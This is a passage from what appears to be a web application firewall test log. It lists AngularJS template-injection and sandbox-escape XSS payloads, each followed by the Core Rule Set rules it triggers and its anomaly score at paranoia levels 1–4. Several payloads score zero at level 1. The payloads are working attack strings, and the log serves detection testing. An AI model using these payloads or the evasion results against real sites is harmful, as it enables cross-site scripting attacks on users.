942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 34
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 47
****** payload-157 ********
Payload:
payload={{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 18
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 39
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 52
****** payload-158 ********
Payload:
payload={{{}.")));alert(1)//"}}</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 18
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 34
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 47
****** payload-159 ********
Payload:
payload={{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 44
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 57
****** payload-160 ********
Payload:
payload={{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 23
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
933161 PL3 PHP Injection Attack: Low-Value PHP Function Call Found
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
933161 PL3 PHP Injection Attack: Low-Value PHP Function Call Found
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
****** payload-161 ********
Payload:
payload={{{}.")));alert(1)//"}}</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 18
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 34
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 47
****** payload-162 ********
Payload:
payload={{{}.")));alert(1)//"}}</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 18
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 34
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 47
****** payload-163 ********
Payload:
payload={{!ready &amp;&amp; (ready = true) &amp;&amp; (
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
921180 PL3 HTTP Parameter Pollution (ARGS_NAMES:amp;)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 20
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
921180 PL3 HTTP Parameter Pollution (ARGS_NAMES:amp;)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 64
****** payload-164 ********
Payload:
payload={{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')));}}
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 50
--- Paranoia Level 4 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 122
****** payload-165 ********
Payload:
'alert(1);'
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
Total Incoming Score: 18
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 28
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
****** payload-166 ********
Payload:
payload={{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}</a>
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
Total Incoming Score: 20
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 48
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 69
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 82
****** payload-167 ********
Payload:
payload={{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}</a>
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
Total Incoming Score: 20
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 53
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 74
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 87
****** payload-168 ********
Payload:
payload={{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}</a>
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
Total Incoming Score: 20
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 59
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 72
****** payload-169 ********
Payload:
payload={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}</a>
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
Total Incoming Score: 20
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 43
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 59
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 72
****** payload-170 ********
Payload:
payload={{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}</a>
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
Total Incoming Score: 20
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
